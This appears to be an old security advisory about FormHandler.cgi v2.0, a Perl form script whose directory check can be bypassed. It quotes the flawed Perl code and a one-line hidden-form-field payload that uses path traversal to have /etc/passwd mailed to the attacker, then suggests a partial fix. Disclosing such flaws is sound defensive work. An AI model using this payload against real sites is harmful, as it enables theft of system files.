COMMAND
FormHandler.cgi
SYSTEMS AFFECTED
Those using cgi above
PROBLEM
Mnemonix found following. FormHandler.cgi available from
http://www.cgi-perl.com/programs/FormHandler uses hard coded
physical paths for templates etc so it's possible to get sensitive
files like /etc/passwd by modifying a site's form and submitting
it.
Concrete example (formhandler.cgi v2.0) - you can download ANY
file which user nobody has read perms to by attaching it to reply
mail. Piece'o'code:
@ALLOWED_ATTACH_DIRS = ('all'); # hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]
if (&valid_directory($filename)) { # let's check if file is allowed
push(@files, $filename); [...] } # to send
[...]
sub valid_directory {
local ($filename) = $_[0];
local ($allowed_path, $restricted_path);
local($valid_dir) = 0;
if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
else {
foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
$valid_dir = ($filename =~ /^$allowed_path/); # silly ...
last if $valid_dir;
}
}
foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
$valid_dir = ($filename !~ /^$restricted_path/); # once more
last if !$valid_dir;
}
return $valid_dir;
}
[...]
How to d/l /etc/passwd? Just add this to the form:
<INPUT TYPE="hidden" NAME="reply_message_attach" VALUE="text:/tmp/../etc/passwd">
... and voila, now wait for /etc/passwd to come to your mailbox.
You can do exactly the same if @ALLOWED_ATTACH_DIRS is not set to
"all". Trivial, isn't it ?
Kevin Hemenway stated that you could add '..' to the
@RESTRICTED_ATTACH_DIRS. This is incorrect and actually breaks
the 'email_template' (and possibly others) feature. You can
however use the following:
@RESTRICTED_ATTACH_DIRS = ('/etc/','\.\.');
This made 'email_template' work again, but could have broken
something else.
SOLUTION
Nothing yet. And future seems to be the same....